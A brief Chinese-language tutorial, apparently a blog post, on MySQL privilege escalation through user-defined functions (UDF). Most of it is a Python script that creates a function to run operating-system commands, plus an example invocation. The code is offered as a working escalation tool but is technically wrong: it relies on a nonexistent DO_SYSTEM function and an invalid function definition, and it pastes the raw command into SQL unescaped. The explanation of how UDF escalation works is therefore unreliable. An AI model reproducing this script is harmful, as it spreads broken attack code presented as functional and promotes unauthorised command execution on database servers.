MySQL提权之UDF提权

在MySQL中，UDF（User-Defined Functions，用户自定义函数）提权是一种通过创建一个特殊的UDF，该UDF在执行时会执行系统命令，从而获得更高权限的一种手段。

以下是一个使用Python编写的简单的MySQL UDF提权示例：

首先，你需要安装MySQLdb库，这是Python操作MySQL的一个库。

pip install mysql-python

然后，编写创建UDF的Python脚本：

# python_udf_priv_esc.py
import MySQLdb
import os
import sys
 
# 连接到MySQL数据库
db = MySQLdb.connect(host="localhost", user="your_username", passwd="your_password", db="mysql")
cursor = db.cursor()
 
# 创建一个UDF，执行系统命令
os_cmd = sys.argv[1]  # 获取命令行参数，即要执行的系统命令
create_udf_sql = """
CREATE FUNCTION `myudf` RETURNS STRING
READS SQL DATA
BEGIN
DECLARE output STRING;
DECLARE command STRING;
SET command = %s;
SET @output = DO_SYSTEM(command);
RETURN @output;
END
""" % os_cmd
 
cursor.execute("DROP FUNCTION IF EXISTS `myudf`;")  # 确保已存在的UDF已被删除
cursor.execute(create_udf_sql)  # 创建新的UDF
 
# 执行UDF
cursor.execute("SELECT myudf();")
result = cursor.fetchone()
print(result[0])  # 打印UDF执行结果
 
# 清理环境，删除UDF
cursor.execute("DROP FUNCTION IF EXISTS `myudf`;")
 
db.close()

在执行该脚本之前，请确保你有足够的权限来连接到MySQL数据库，并且你知道自己在做什么，因为执行这样的提权操作可能会违反法律法规。

在使用该脚本时，你需要提供一个系统命令作为参数，例如：

python python_udf_priv_esc.py "uname -a"

这个脚本会创建一个UDF，当调用这个UDF时，它将执行提供的系统命令，并返回结果。这个过程可以用来检查系统信息、执行提权命令等。